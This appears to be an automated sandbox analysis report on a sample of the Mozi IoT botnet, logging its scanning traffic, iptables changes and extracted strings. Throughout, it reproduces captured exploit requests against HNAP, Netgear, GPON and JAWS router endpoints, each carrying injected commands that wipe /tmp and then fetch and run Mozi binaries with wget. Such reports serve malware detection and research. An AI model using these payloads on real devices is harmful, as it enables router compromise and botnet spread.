                Source: global trafficTCP traffic: 192.168.2.20:45528 -> 84.78.78.130:8080
                Source: global trafficTCP traffic: 192.168.2.20:57140 -> 114.194.154.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:59960 -> 118.126.149.210:81
                Source: global trafficTCP traffic: 192.168.2.20:37068 -> 102.245.187.124:8080
                Source: global trafficTCP traffic: 192.168.2.20:48564 -> 178.227.209.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:35660 -> 89.89.254.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:40876 -> 161.117.155.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:35122 -> 47.125.48.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:43976 -> 215.181.140.3:81
                Source: global trafficTCP traffic: 192.168.2.20:53318 -> 166.221.246.62:7574
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 1.21.220.147:8443
                Source: global trafficTCP traffic: 192.168.2.20:44516 -> 215.199.64.119:8080
                Source: global trafficTCP traffic: 192.168.2.20:34308 -> 213.35.187.150:7574
                Source: global trafficTCP traffic: 192.168.2.20:45786 -> 205.13.133.200:81
                Source: global trafficTCP traffic: 192.168.2.20:51100 -> 191.252.54.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:47264 -> 174.166.72.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:55356 -> 89.18.94.49:52869
                Source: global trafficTCP traffic: 192.168.2.20:41066 -> 66.220.233.134:8443
                Source: global trafficTCP traffic: 192.168.2.20:50846 -> 208.243.26.125:5555
                Source: global trafficTCP traffic: 192.168.2.20:33342 -> 95.80.182.34:8443
                Source: global trafficTCP traffic: 192.168.2.20:48468 -> 129.9.82.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:34874 -> 126.12.240.246:81
                Source: global trafficTCP traffic: 192.168.2.20:49698 -> 41.9.236.30:37215
                Source: global trafficTCP traffic: 192.168.2.20:44546 -> 115.114.122.15:52869
                Source: global trafficTCP traffic: 192.168.2.20:52378 -> 55.59.39.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:41488 -> 216.211.142.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:58570 -> 64.104.185.88:5555
                Source: global trafficTCP traffic: 192.168.2.20:49562 -> 65.99.212.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:32920 -> 209.34.156.41:8080
                Source: global trafficTCP traffic: 192.168.2.20:38992 -> 190.21.153.214:7574
                Source: global trafficTCP traffic: 192.168.2.20:39230 -> 58.205.220.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:51852 -> 125.120.31.95:7574
                Source: global trafficTCP traffic: 192.168.2.20:56814 -> 41.244.197.101:8443
                Source: global trafficTCP traffic: 192.168.2.20:43750 -> 138.208.123.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:51466 -> 183.51.240.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:42914 -> 35.244.23.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:54738 -> 130.52.53.47:81
                Source: global trafficTCP traffic: 192.168.2.20:56558 -> 220.221.221.108:8080
                Source: global trafficTCP traffic: 192.168.2.20:54948 -> 152.90.233.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:55164 -> 27.169.136.209:49152
                Source: global trafficTCP traffic: 192.168.2.20:38372 -> 40.99.150.234:8443
                Source: global trafficTCP traffic: 192.168.2.20:49502 -> 74.96.156.31:81
                Source: global trafficTCP traffic: 192.168.2.20:47774 -> 193.51.46.187:81
                Source: global trafficTCP traffic: 192.168.2.20:44296 -> 216.109.183.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:47590 -> 126.191.100.107:49152
                Source: global trafficTCP traffic: 192.168.2.20:47550 -> 125.153.37.11:5555
                Source: global trafficTCP traffic: 192.168.2.20:39112 -> 114.132.33.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:60534 -> 155.0.76.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:46608 -> 188.115.113.70:5555
                Source: global trafficTCP traffic: 192.168.2.20:43454 -> 79.231.62.91:49152
                Source: global trafficTCP traffic: 192.168.2.20:44782 -> 136.133.36.86:5555
                Source: global trafficTCP traffic: 192.168.2.20:59126 -> 51.188.61.166:8080
                Source: global trafficTCP traffic: 192.168.2.20:35234 -> 12.4.137.28:8443
                Source: global trafficTCP traffic: 192.168.2.20:35780 -> 208.226.139.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:60242 -> 71.129.56.39:52869
                Source: global trafficTCP traffic: 192.168.2.20:49370 -> 82.33.25.142:8443
                Source: global trafficTCP traffic: 192.168.2.20:40060 -> 99.7.230.121:81
                Source: global trafficTCP traffic: 192.168.2.20:53220 -> 87.236.72.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:55288 -> 106.165.30.99:5555
                Source: global trafficTCP traffic: 192.168.2.20:60864 -> 164.83.153.43:52869
                Source: global trafficTCP traffic: 192.168.2.20:45296 -> 89.28.59.57:49152
                Source: global trafficTCP traffic: 192.168.2.20:51774 -> 133.89.144.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:40538 -> 136.86.4.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:46918 -> 148.33.215.101:52869
                Source: global trafficTCP traffic: 192.168.2.20:55352 -> 187.248.127.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:56308 -> 60.81.104.12:49152
                Source: global trafficTCP traffic: 192.168.2.20:34138 -> 36.120.123.216:52869
                Source: global trafficTCP traffic: 192.168.2.20:52034 -> 216.189.38.126:5555
                Source: global trafficTCP traffic: 192.168.2.20:60450 -> 122.16.34.10:81
                Source: global trafficTCP traffic: 192.168.2.20:34828 -> 69.108.163.108:49152
                Source: global trafficTCP traffic: 192.168.2.20:56598 -> 147.121.39.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:35588 -> 219.217.46.6:81
                Source: global trafficTCP traffic: 192.168.2.20:60950 -> 121.89.157.177:52869
                Source: global trafficTCP traffic: 192.168.2.20:60216 -> 200.177.82.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:54950 -> 95.145.77.101:5555
                Source: global trafficTCP traffic: 192.168.2.20:40288 -> 47.59.64.91:81
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 75.154.37.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:44980 -> 119.192.203.59:5555
                Source: global trafficTCP traffic: 192.168.2.20:47606 -> 146.33.219.4:7574
                Source: global trafficTCP traffic: 192.168.2.20:54352 -> 75.178.23.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:47506 -> 45.1.148.196:5555
                Source: global trafficTCP traffic: 192.168.2.20:60564 -> 157.48.19.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:35052 -> 68.116.62.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:32946 -> 33.11.4.154:8443
                Source: global trafficTCP traffic: 192.168.2.20:49746 -> 194.176.233.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:46522 -> 178.221.126.119:7574
                Source: global trafficTCP traffic: 192.168.2.20:55064 -> 38.116.11.222:37215
                Source: global trafficTCP traffic: 192.168.2.20:39102 -> 179.128.137.93:5555
                Source: global trafficTCP traffic: 192.168.2.20:52894 -> 6.36.182.64:81
                Source: global trafficTCP traffic: 192.168.2.20:46148 -> 151.29.44.170:8443
                Source: global trafficTCP traffic: 192.168.2.20:42380 -> 162.53.49.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:45344 -> 168.119.247.129:7574
                Source: global trafficTCP traffic: 192.168.2.20:43220 -> 136.79.119.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:39634 -> 60.229.225.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:45634 -> 58.167.45.11:52869
                Source: global trafficTCP traffic: 192.168.2.20:38652 -> 61.40.32.6:7574
                Source: global trafficTCP traffic: 192.168.2.20:43210 -> 6.51.176.149:8443
                Source: global trafficTCP traffic: 192.168.2.20:44510 -> 178.99.201.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 129.212.171.46:5555
                Source: global trafficTCP traffic: 192.168.2.20:40684 -> 111.14.162.42:37215
                Source: global trafficTCP traffic: 192.168.2.20:41314 -> 138.193.244.97:52869
                Source: global trafficTCP traffic: 192.168.2.20:35440 -> 106.231.94.244:37215
                Source: global trafficTCP traffic: 192.168.2.20:57628 -> 94.140.74.218:49152
                Source: global trafficTCP traffic: 192.168.2.20:49032 -> 24.202.186.134:8080
                Source: /bin/sh (PID: 4618) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 107.170.200.206:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi. Data Raw: Data Ascii:
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 34.117.168.156:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 23.218.46.16:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro Data Raw: Data Ascii:
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 206.212.1.199:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 51.178.69.101:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 206.212.1.199:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 38.87.83.34:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 23.218.148.138:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: /tmp/Mozi.m (PID: 4603) Socket: 0.0.0.0::56870
                Source: unknown TCP traffic detected without corresponding DNS query: 174.143.64.178
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 06 Jan 2021 14:00:05 GMT Content-Length: 853
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 23.44.146.105:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 203.146.142.202:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 54.164.156.191:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 45.196.102.179:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 104.98.58.115:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 192.155.170.244:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 184.31.173.81:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
                Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 127.0.0.1:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: Hello, World Content-Length: 118 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 06 Jan 2021 13:57:39 GMT Server: Apache/2.4.39 (Unix) OpenSSL/1.0.2k-fips Content-Length: 216 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;$
                Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh
                Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: Mozi.m String found in binary or memory: http://127.0.0.1
                Source: Mozi.m String found in binary or memory: http://127.0.0.1sendcmd
                Source: Mozi.m String found in binary or memory: http://HTTP/1.1
                Source: Mozi.m String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.6.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: Mozi.m String found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: Mozi.m String found in binary or memory: http://purenetworks.com/HNAP1/
                Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.6.dr String found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/Mozi.m (PID: 4580) HTML file containing JavaScript created: /usr/networks
                Source: Initial sample String containing 'busybox' found: busybox
                Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
